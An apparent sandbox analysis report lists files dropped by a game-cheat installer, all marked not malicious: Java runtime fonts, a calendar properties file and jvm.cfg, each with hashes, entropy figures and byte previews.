                                C:\Program Files (x86)\Arcane Cheat\jre\lib\fonts\LucidaBrightRegular.ttf (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,421.Lucida BrightRegularLucida Bright Regu
                                Category:dropped
                                Size (bytes):344908
                                Entropy (8bit):6.939775499317555
                                Encrypted:false
                                SSDEEP:6144:oBfQeUG2CCTufrmOufymM8hvFHp277tS9iZFYSATxNm:oNQ3vCCTcaFNJw7tSgYS82
                                MD5:630A6FA16C414F3DE6110E46717AAD53
                                SHA1:5D7ED564791C900A8786936930BA99385653139C
                                SHA-256:0FAAACA3C730857D3E50FBA1BBAD4CA2330ADD217B35E22B7E67F02809FAC923
                                SHA-512:0B7CDE0FACE982B5867AEBFB92918404ADAC7FB351A9D47DCD9FE86C441CACA4DD4EC22E36B61025092220C0A8730D292DA31E9CAFD7808C56CDBF34ECD05035
                                Malicious:false
                                Preview:...........pLTSHN..U..=....~OS/2...S.......Vcmap..tO...T....cvt =|t>.......tfpgm..1....`....glyf.J.........Jhdmx]......D....head.WD...h...6hhea.j.........$hmtxW.6|........loca............maxp......4.... nameJO....4....rpost..g...8,..M.prep.].O.......T.............).......).....d. .............."....`........B&H..@. ...D.]...... ................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~......................................................................................................|...........~.............&.u.z.~.......................O.\.....................:.R.m.......... . . . . " & 0 : D t .!"!&!.".%....................3.b.r.t....... .............&.t.z.~.........................Q.^...................!.@.`.p........ . . . . & 0 9 D t .!"!&!.".%....................3.^.p.t.v.........W.......M......................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\fonts\LucidaSansDemiBold.ttf (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 15 tables, 1st "LTSH", 19 names, Macintosh, Copyright (c) 1999, 2001 by Bigelow & Holmes Inc. Pat. Des. 289,420.Lucida SansDemiboldLucida Sa
                                Category:dropped
                                Size (bytes):317896
                                Entropy (8bit):6.869598480468745
                                Encrypted:false
                                SSDEEP:6144:R5OO1ZjNDE7/MsTJ30otegK4zJwz3UhG5jXsrg2HLzYv7cf0R7o7+WX/ov2DG:bOO11CEo9xzJwljXsrhHQ7cMuX/16
                                MD5:5DD099908B722236AA0C0047C56E5AF2
                                SHA1:92B79FEFC35E96190250C602A8FED85276B32A95
                                SHA-256:53773357D739F89BC10087AB2A829BA057649784A9ACBFFEE18A488B2DCCB9EE
                                SHA-512:440534EB2076004BEA66CF9AC2CE2B37C10FBF5CC5E0DD8B8A8EDEA25E3613CE8A59FFCB2500F60528BBF871FF37F1D0A3C60396BC740CCDB4324177C38BE97A
                                Malicious:false
                                Preview:...........pLTSH_R.a........OS/2...........Vcmapz.$L.......Zcvt ...y...8...hfpgm..1.........glyf......\....hdmx..0A.......hhead..&..:H...6hhea......:....$hmtx.,Z:..:.....loca.~'...T.....maxp......n.... name..=%..n....Kpost$.#...s$..[?prep......d...a..........................................)........2'............'........ ....................".".............0.%...............%...........)....................... ......0 ..............................) ) ) ) ...........................................2.2.2.2.).......................................................'"'"'"1....0.........................................................................................................'.....'...........)..,...&,....#............./&.....&.&.$.....$...$........'....... ....)...."...,.......+.....'....).,.....-)..)................... ..."..................,.........(.........,........................../..2.......+.........,.#) .....................+..).........0......+...............,.,.,......

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\fonts\LucidaSansRegular.ttf (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 18 tables, 1st "GDEF", 19 names, Macintosh, Copyright (c) 1999 by Bigelow & Holmes Inc. Pat. Des. 289,420.Lucida SansRegularLucida Sans Regu
                                Category:dropped
                                Size (bytes):698236
                                Entropy (8bit):6.892888039120645
                                Encrypted:false
                                SSDEEP:12288:6obn11t7t7DxT+3+OQ64cctiOAq12ZX/DmfT6R83Sd8uvx7wSnyER4ky+SH/KPKQ:6oTJZzHniOAZ783Sd8uvx7wSnyER4kyI
                                MD5:B75309B925371B38997DF1B25C1EA508
                                SHA1:39CC8BCB8D4A71D4657FC92EF0B9F4E3E9E67ADD
                                SHA-256:F8D877B0B64600E736DFE436753E8E11ACB022E59B5D7723D7D221D81DC2FCDE
                                SHA-512:9C792EF3116833C90103F27CFD26A175AB1EB11286959F77062893A2E15DE44D79B27E5C47694CBBA734CC05A9A5BEFA72E991C7D60EAB1495AAC14C5CAD901D
                                Malicious:false
                                Preview:........... GDEF..|.......GPOS.......L...HGSUB.f.........LTSH...........uOS/2.#GQ...,...Vcmap..4........4cvt .y..........fpgm.!&.........glyf. ..........hdmx...M...(...\head..........6hhea...........$hmtx.S........-.loca'.c......-.maxp...Y....... nameW..r........post.&-.........prep.........................).......).....d. ...................{........B&H..@. ...D.]......`................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~..........................................................................................................".....".~...............E.u.z.~.......................O.\...............................:.R.m.............9.M.T.p.:.[.... . F p . . .!8!.!.".#.#.#!$i%.%.%.%.%.%.%.%$%,%4%<%l%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.&.&.&.&.&<&@&B&`&c&f&k'.'.'''K'M'R'V'^'g'.'.'................ .3.....6.<.>.A.D.N.b.r.t......... .........P.......t.z.~

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\fonts\LucidaTypewriterBold.ttf (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 13 tables, 1st "OS/2", 16 names, Macintosh, Copyright (c) 1999, 2001 by Bigelow & Holmes Inc.Lucida Sans TypewriterBoldLucida Sans Typewrite
                                Category:dropped
                                Size (bytes):234068
                                Entropy (8bit):6.901545053424004
                                Encrypted:false
                                SSDEEP:6144:3BPS7w5KIMtYwqcO3GbA4MJcs2ME9UGQ2n9gM/oD:xVMtgcGGPMJcs4b9gM/4
                                MD5:A0C96AA334F1AEAA799773DB3E6CBA9C
                                SHA1:A5DA2EB49448F461470387C939F0E69119310E0B
                                SHA-256:FC908259013B90F1CBC597A510C6DD7855BF9E7830ABE3FC3612AB4092EDCDE2
                                SHA-512:A43CF773A42B4CEBF4170A6C94060EA2602D2D7FA7F6500F69758A20DC5CC3ED1793C7CEB9B44CE8640721CA919D2EF7F9568C5AF58BA6E3CF88EAE19A95E796
                                Malicious:false
                                Preview:...........POS/2..........VcmapW......4....cvt .M/.........fpgm..1.........glyf|......@....head.c....L...6hhea...........$hmtx.e.........tloca..h..."....xmaxp......7.... name......7.....post1..%..;h..I.prep.......4... .............3.......3...1.f................+...x.........B&H.. . ...D.]......`................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a....................................................................................................................................x...........~...............u.z.~.......................O.\...............................:.R.m...........:.[.... . . . " & 0 3 : < > D . . . . .!.!.!.!"!&!.!^!.!.".".".".".".".")"+"H"a"e#.#.#!%.%.%.%.%.%.%.%$%,%4%<%l%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.&<&@&B&`&c&f&k...................3...b.r.t....... ...............t.z.~.........................Q.^.............................!.@.`.p...........?.... . . . &

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\fonts\LucidaTypewriterRegular.ttf (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 13 tables, 1st "OS/2", 16 names, Macintosh, Copyright (c) 1999 by Bigelow & Holmes Inc.Lucida Sans TypewriterRegularLucida Sans Typewriter R
                                Category:dropped
                                Size (bytes):242700
                                Entropy (8bit):6.936925430880877
                                Encrypted:false
                                SSDEEP:3072:VwzZsJcCrn271g+UGFDUnrrHqMyBtlc3+fzx5R1zeqZdDgfSkecUfEDpEXzSyPMx:GWcCrn2C46Ak+naqaucYEDpEX3gZoO9
                                MD5:C1397E8D6E6ABCD727C71FCA2132E218
                                SHA1:C144DCAFE4FAF2E79CFD74D8134A631F30234DB1
                                SHA-256:D9D0AAB0354C3856DF81AFAC49BDC586E930A77428CB499007DDE99ED31152FF
                                SHA-512:DA70826793C7023E61F272D37E2CC2983449F26926746605C550E9D614ACBF618F73D03D0C6351B9537703B05007CD822E42E6DC74423CB5CC736B31458D33B1
                                Malicious:false
                                Preview:...........POS/2...s.......`cmap..Rh...<....cvt m......@...<fpgm..1....|....glyf..;}...8....head.,j..2L...6hhea......2....$hmtx.....2.....loca.PB...H(....maxp.z....].... namex.R...].....post...Q..ax..I.prep.UJ....\.................).......).....d. ..............{.............B&H..@. ...D.\...... ........=..... ......................................................................................... !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~..................................................................................................................~...............u.z.~.......................O.\...............................:.R.m...........:.[.... . . . " & 0 3 : < > D . . . .!.!.!.!"!&!.!^!.!.".".".".".".".")"+"H"a"e#.#.#!%.%.%.%.%.%.%.%$%,%4%<%l%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.&<&@&B&`&c&f&k.........................3...b.r.t....... ...............t.z.~.........................Q.^.............................!.@.`.p...........?..

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\fonts\is-5GSHU.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 15 tables, 1st "LTSH", 19 names, Macintosh, Copyright (c) 1999, 2001 by Bigelow & Holmes Inc. Pat. Des. 289,420.Lucida SansDemiboldLucida Sa
                                Category:dropped
                                Size (bytes):317896
                                Entropy (8bit):6.869598480468745
                                Encrypted:false
                                SSDEEP:6144:R5OO1ZjNDE7/MsTJ30otegK4zJwz3UhG5jXsrg2HLzYv7cf0R7o7+WX/ov2DG:bOO11CEo9xzJwljXsrhHQ7cMuX/16
                                MD5:5DD099908B722236AA0C0047C56E5AF2
                                SHA1:92B79FEFC35E96190250C602A8FED85276B32A95
                                SHA-256:53773357D739F89BC10087AB2A829BA057649784A9ACBFFEE18A488B2DCCB9EE
                                SHA-512:440534EB2076004BEA66CF9AC2CE2B37C10FBF5CC5E0DD8B8A8EDEA25E3613CE8A59FFCB2500F60528BBF871FF37F1D0A3C60396BC740CCDB4324177C38BE97A
                                Malicious:false
                                Preview:...........pLTSH_R.a........OS/2...........Vcmapz.$L.......Zcvt ...y...8...hfpgm..1.........glyf......\....hdmx..0A.......hhead..&..:H...6hhea......:....$hmtx.,Z:..:.....loca.~'...T.....maxp......n.... name..=%..n....Kpost$.#...s$..[?prep......d...a..........................................)........2'............'........ ....................".".............0.%...............%...........)....................... ......0 ..............................) ) ) ) ...........................................2.2.2.2.).......................................................'"'"'"1....0.........................................................................................................'.....'...........)..,...&,....#............./&.....&.&.$.....$...$........'....... ....)...."...,.......+.....'....).,.....-)..)................... ..."..................,.........(.........,........................../..2.......+.........,.#) .....................+..).........0......+...............,.,.,......

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\fonts\is-656OT.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 13 tables, 1st "OS/2", 16 names, Macintosh, Copyright (c) 1999, 2001 by Bigelow & Holmes Inc.Lucida Sans TypewriterBoldLucida Sans Typewrite
                                Category:dropped
                                Size (bytes):234068
                                Entropy (8bit):6.901545053424004
                                Encrypted:false
                                SSDEEP:6144:3BPS7w5KIMtYwqcO3GbA4MJcs2ME9UGQ2n9gM/oD:xVMtgcGGPMJcs4b9gM/4
                                MD5:A0C96AA334F1AEAA799773DB3E6CBA9C
                                SHA1:A5DA2EB49448F461470387C939F0E69119310E0B
                                SHA-256:FC908259013B90F1CBC597A510C6DD7855BF9E7830ABE3FC3612AB4092EDCDE2
                                SHA-512:A43CF773A42B4CEBF4170A6C94060EA2602D2D7FA7F6500F69758A20DC5CC3ED1793C7CEB9B44CE8640721CA919D2EF7F9568C5AF58BA6E3CF88EAE19A95E796
                                Malicious:false
                                Preview:...........POS/2..........VcmapW......4....cvt .M/.........fpgm..1.........glyf|......@....head.c....L...6hhea...........$hmtx.e.........tloca..h..."....xmaxp......7.... name......7.....post1..%..;h..I.prep.......4... .............3.......3...1.f................+...x.........B&H.. . ...D.]......`................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a....................................................................................................................................x...........~...............u.z.~.......................O.\...............................:.R.m...........:.[.... . . . " & 0 3 : < > D . . . . .!.!.!.!"!&!.!^!.!.".".".".".".".")"+"H"a"e#.#.#!%.%.%.%.%.%.%.%$%,%4%<%l%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.&<&@&B&`&c&f&k...................3...b.r.t....... ...............t.z.~.........................Q.^.............................!.@.`.p...........?.... . . . &

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\fonts\is-9LD56.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc.Lucida BrightDemibold ItalicLucida Bright Demibold Itali
                                Category:dropped
                                Size (bytes):75124
                                Entropy (8bit):6.805969666701276
                                Encrypted:false
                                SSDEEP:1536:lww80sTGzcKHwxWL0T+qHi/sbA06PoNORsr5sOnD0OyuusGa7bs4J:lwL0i97WL0T+qHA9cOR05FD0Oyup74w
                                MD5:793AE1AB32085C8DE36541BB6B30DA7C
                                SHA1:1FD1F757FEBF3E5F5FBB7FBF7A56587A40D57DE7
                                SHA-256:895C5262CDB6297C13725515F849ED70609DBD7C49974A382E8BBFE4A3D75F8C
                                SHA-512:A92ADDD0163F6D81C3AEABD63FF5C293E71A323F4AEDFB404F6F1CDE7F84C2A995A30DFEC84A9CAF8FFAF8E274EDD0D7822E6AABB2B0608696A360CABFC866C6
                                Malicious:false
                                Preview:...........pLTSH.....#.....OS/2k.{........Vcmap.U.z...T...jcvt =jC.........fpgm..1.........glyf.......h...Jhdmx.......`..1.head..X.......6hhea...;.......$hmtx.b......... loca..\....0....maxp...:...D... name .7]...d....postM..A........prep.C.f....................).......).....d. ............................B&H..!. .3.D.\...... ................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~......................................................................................................P...T.@.....~.............&.. . . . . " & 0 : D t .!"!&"."."."."."."+"H"`"e%................3..... .............&.. . . . . & 0 9 D t .!"!&"."."."."."."+"H"`"d%................3.........W.......M...d...............1.....j.y........t.q._./.0.......v.t.r.p.g.T.....R..........................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\fonts\is-ABJOJ.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,421.Lucida BrightRegularLucida Bright Regu
                                Category:dropped
                                Size (bytes):344908
                                Entropy (8bit):6.939775499317555
                                Encrypted:false
                                SSDEEP:6144:oBfQeUG2CCTufrmOufymM8hvFHp277tS9iZFYSATxNm:oNQ3vCCTcaFNJw7tSgYS82
                                MD5:630A6FA16C414F3DE6110E46717AAD53
                                SHA1:5D7ED564791C900A8786936930BA99385653139C
                                SHA-256:0FAAACA3C730857D3E50FBA1BBAD4CA2330ADD217B35E22B7E67F02809FAC923
                                SHA-512:0B7CDE0FACE982B5867AEBFB92918404ADAC7FB351A9D47DCD9FE86C441CACA4DD4EC22E36B61025092220C0A8730D292DA31E9CAFD7808C56CDBF34ECD05035
                                Malicious:false
                                Preview:...........pLTSHN..U..=....~OS/2...S.......Vcmap..tO...T....cvt =|t>.......tfpgm..1....`....glyf.J.........Jhdmx]......D....head.WD...h...6hhea.j.........$hmtxW.6|........loca............maxp......4.... nameJO....4....rpost..g...8,..M.prep.].O.......T.............).......).....d. .............."....`........B&H..@. ...D.]...... ................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~......................................................................................................|...........~.............&.u.z.~.......................O.\.....................:.R.m.......... . . . . " & 0 : D t .!"!&!.".%....................3.b.r.t....... .............&.t.z.~.........................Q.^...................!.@.`.p........ . . . . & 0 9 D t .!"!&!.".%....................3.^.p.t.v.........W.......M......................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\fonts\is-LTJKT.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 18 tables, 1st "GDEF", 19 names, Macintosh, Copyright (c) 1999 by Bigelow & Holmes Inc. Pat. Des. 289,420.Lucida SansRegularLucida Sans Regu
                                Category:dropped
                                Size (bytes):698236
                                Entropy (8bit):6.892888039120645
                                Encrypted:false
                                SSDEEP:12288:6obn11t7t7DxT+3+OQ64cctiOAq12ZX/DmfT6R83Sd8uvx7wSnyER4ky+SH/KPKQ:6oTJZzHniOAZ783Sd8uvx7wSnyER4kyI
                                MD5:B75309B925371B38997DF1B25C1EA508
                                SHA1:39CC8BCB8D4A71D4657FC92EF0B9F4E3E9E67ADD
                                SHA-256:F8D877B0B64600E736DFE436753E8E11ACB022E59B5D7723D7D221D81DC2FCDE
                                SHA-512:9C792EF3116833C90103F27CFD26A175AB1EB11286959F77062893A2E15DE44D79B27E5C47694CBBA734CC05A9A5BEFA72E991C7D60EAB1495AAC14C5CAD901D
                                Malicious:false
                                Preview:........... GDEF..|.......GPOS.......L...HGSUB.f.........LTSH...........uOS/2.#GQ...,...Vcmap..4........4cvt .y..........fpgm.!&.........glyf. ..........hdmx...M...(...\head..........6hhea...........$hmtx.S........-.loca'.c......-.maxp...Y....... nameW..r........post.&-.........prep.........................).......).....d. ...................{........B&H..@. ...D.]......`................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~..........................................................................................................".....".~...............E.u.z.~.......................O.\...............................:.R.m.............9.M.T.p.:.[.... . F p . . .!8!.!.".#.#.#!$i%.%.%.%.%.%.%.%$%,%4%<%l%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.&.&.&.&.&<&@&B&`&c&f&k'.'.'''K'M'R'V'^'g'.'.'................ .3.....6.<.>.A.D.N.b.r.t......... .........P.......t.z.~

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\fonts\is-NGCN5.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 13 tables, 1st "OS/2", 16 names, Macintosh, Copyright (c) 1999 by Bigelow & Holmes Inc.Lucida Sans TypewriterRegularLucida Sans Typewriter R
                                Category:dropped
                                Size (bytes):242700
                                Entropy (8bit):6.936925430880877
                                Encrypted:false
                                SSDEEP:3072:VwzZsJcCrn271g+UGFDUnrrHqMyBtlc3+fzx5R1zeqZdDgfSkecUfEDpEXzSyPMx:GWcCrn2C46Ak+naqaucYEDpEX3gZoO9
                                MD5:C1397E8D6E6ABCD727C71FCA2132E218
                                SHA1:C144DCAFE4FAF2E79CFD74D8134A631F30234DB1
                                SHA-256:D9D0AAB0354C3856DF81AFAC49BDC586E930A77428CB499007DDE99ED31152FF
                                SHA-512:DA70826793C7023E61F272D37E2CC2983449F26926746605C550E9D614ACBF618F73D03D0C6351B9537703B05007CD822E42E6DC74423CB5CC736B31458D33B1
                                Malicious:false
                                Preview:...........POS/2...s.......`cmap..Rh...<....cvt m......@...<fpgm..1....|....glyf..;}...8....head.,j..2L...6hhea......2....$hmtx.....2.....loca.PB...H(....maxp.z....].... namex.R...].....post...Q..ax..I.prep.UJ....\.................).......).....d. ..............{.............B&H..@. ...D.\...... ........=..... ......................................................................................... !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~..................................................................................................................~...............u.z.~.......................O.\...............................:.R.m...........:.[.... . . . " & 0 3 : < > D . . . .!.!.!.!"!&!.!^!.!.".".".".".".".")"+"H"a"e#.#.#!%.%.%.%.%.%.%.%$%,%4%<%l%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.&<&@&B&`&c&f&k.........................3...b.r.t....... ...............t.z.~.........................Q.^.............................!.@.`.p...........?..

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\fonts\is-NTO90.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,422.Lucida BrightDemiboldLucida Bright Dem
                                Category:dropped
                                Size (bytes):75144
                                Entropy (8bit):6.849420541001734
                                Encrypted:false
                                SSDEEP:768:H8Jwt1GIlZ6l0/9tRWhc0x/YxvsTjyIDXCrGU/tlDaKAgKrTLznvzDJIZmjFA0zG:Mwtze9xQcQ/LDaKAgK3LLvzFogbFt5WD
                                MD5:AF0C5C24EF340AEA5CCAC002177E5C09
                                SHA1:B5C97F985639E19A3B712193EE48B55DDA581FD1
                                SHA-256:72CEE3E6DF72AD577AF49C59DCA2D0541060F95A881845950595E5614C486244
                                SHA-512:6CE87441E223543394B7242AC0CB63505888B503EC071BBF7DB857B5C935B855719B818090305E17C1197DE882CCC90612FB1E0A0E5D2731F264C663EB8DA3F9
                                Malicious:false
                                Preview:...........pLTSH$....#.....OS/2p.{........Vcmap.U.z...T...jcvt 8.E.........fpgm..1.........glyf@>.7...l....hdmx..(:...t..1.head.?....T...6hhea.U........$hmtx..ys...... loca..\4........maxp.8......... name..#.........postM.IA.......prepbM.h.......W.............).......).....d. ............................B&H.. . .3.D.\...... ................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~......................................................................................................P...T.@.....~.............&.. . . . . " & 0 : D t .!"!&"."."."."."."+"H"`"e%................3..... .............&.. . . . . & 0 9 D t .!"!&"."."."."."."+"H"`"d%................3.........W.......M...d...............1.....j.y........t.q._./.0.......v.t.r.p.g.T.....R..........................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\fonts\is-REGRC.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,773.Lucida BrightItalicLucida Bright Itali
                                Category:dropped
                                Size (bytes):80856
                                Entropy (8bit):6.821405620058844
                                Encrypted:false
                                SSDEEP:1536:jw9ESkPFybxWj1V7zbPUoOPjp85rFqXpLboVklDNTc2Wt:jwZO0xWPTU7l85rFYpLbott
                                MD5:4D666869C97CDB9E1381A393FFE50A3A
                                SHA1:AA5C037865C563726ECD63D61CA26443589BE425
                                SHA-256:D68819A70B60FF68CA945EF5AD358C31829E43EC25024A99D17174C626575E06
                                SHA-512:1D1F61E371E4A667C90C2CE315024AE6168E47FE8A5C02244DBF3DF26E8AC79F2355AC7E36D4A81D82C52149197892DAED1B4C19241575256BB4541F8B126AE2
                                Malicious:false
                                Preview:...........pLTSH...2..:L....OS/2p.|y.......Vcmap.U.z...T...jcvt F.;.........fpgm..1.........glyf.}.....@....hdmx?..p......1.head.A![.......6hhea.......P...$hmtx3..9...t... loca6..........maxp.......... name...p.......~postM..A...H....prep.......................).......).6...d. ............................B&H.... .3.D.\...... ................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~......................................................................................................P...T.@.....~.............&.. . . . . " & 0 : D t .!"!&"."."."."."."+"H"`"e%................3..... .............&.. . . . . & 0 9 D t .!"!&"."."."."."."+"H"`"d%................3.........W.......M...d...............1.....j.y........t.q._./.0.......v.t.r.p.g.T.....R..........................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\hijrah-config-umalqura.properties (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):14331
                                Entropy (8bit):3.512673497574481
                                Encrypted:false
                                SSDEEP:96:W6Zh/3dzz8XIrN2r1CdaqRWtHwBWgvw0Jy/ArUsJzu0HI:W6jhGIwxCdaqWQBWgvw0JyorBJzu0o
                                MD5:6E378235FB49F30C9580686BA8A787AA
                                SHA1:2FC76D9D615A35244133FC01AB7381BA49B0B149
                                SHA-256:B4A0C0A98624C48A801D8EA071EC4A3D582826AC9637478814591BC6EA259D4A
                                SHA-512:58558A1F8D9D3D6F0E21B1269313FD6AC9A80A93CC093A5E8CDEC495855FCD2FC95A6B54FE59E714E89D9274654BB9C1CD887B3FB9D4B9D9C50E5C5983C571B8
                                Malicious:false
                                Preview:# Copyright (c) 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..# This properties file defines a Hijrah calendar variant...#..# Fields:..#..# <version> ::= 'version' '=' <version string>..# <id> ::= 'id' '=' <id string>..# <type> ::= 'type' '=' <type string>..# <iso-start> ::= 'iso-start' '=' <start date in the ISO calendar>..# <year> ::= <yyyy> '=' <nn nn nn nn nn nn nn nn nn nn nn nn>..#..# version ... (Required)..#..# id ... (Required)..# Identifies the Java Chronology..#..# type ... (Required)..# Identifies the type of calendar in the standard calendar ID scheme..# iso-start ... (Required)..# Specifies the corresponding ISO date to the first Hijrah day..# in the defined range of dates..#..# year ... (Required)..# Number of days for each month of a Hijrah year..# * Each line defines a ye

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\i386\is-3KI1N.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):657
                                Entropy (8bit):4.993355967240905
                                Encrypted:false
                                SSDEEP:12:QcwmIzDpneoeoeoeoeoeoeoeoeoeoeoeoeoeoeoeoeoeoeoe9B7aEiwoXH3Eoe4Q:QhDpemaoXHIB5foMS1JUqf07f
                                MD5:9FD47C1A487B79A12E90E7506469477B
                                SHA1:7814DF0FF2EA1827C75DCD73844CA7F025998CC6
                                SHA-256:A73AEA3074360CF62ADEDC0C82BC9C0C36C6A777C70DA6C544D0FBA7B2D8529E
                                SHA-512:97B9D4C68AC4B534F86EFA9AF947763EE61AEE6086581D96CBF7B3DBD6FD5D9DB4B4D16772DCE6F347B44085CEF8A6EA3BFD3B84FBD9D4EF763CEF39255FBCE3
                                Malicious:false
                                Preview:# Copyright (c) 2001, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..# List of JVMs that can be used as an option to java, javac, etc...# Order is important -- first in this list is the default JVM...# NOTE that this both this file and its format are UNSUPPORTED and..# WILL GO AWAY in a future release...#..# You may also select a JVM in an arbitrary location with the..# "-XXaltjvm=<jvm_dir>" option, but that too is unsupported..# and may not be available in a future release...#..-client KNOWN..-server KNOWN..

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\i386\jvm.cfg (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):657
                                Entropy (8bit):4.993355967240905
                                Encrypted:false
                                SSDEEP:12:QcwmIzDpneoeoeoeoeoeoeoeoeoeoeoeoeoeoeoeoeoeoeoe9B7aEiwoXH3Eoe4Q:QhDpemaoXHIB5foMS1JUqf07f
                                MD5:9FD47C1A487B79A12E90E7506469477B
                                SHA1:7814DF0FF2EA1827C75DCD73844CA7F025998CC6
                                SHA-256:A73AEA3074360CF62ADEDC0C82BC9C0C36C6A777C70DA6C544D0FBA7B2D8529E
                                SHA-512:97B9D4C68AC4B534F86EFA9AF947763EE61AEE6086581D96CBF7B3DBD6FD5D9DB4B4D16772DCE6F347B44085CEF8A6EA3BFD3B84FBD9D4EF763CEF39255FBCE3
                                Malicious:false
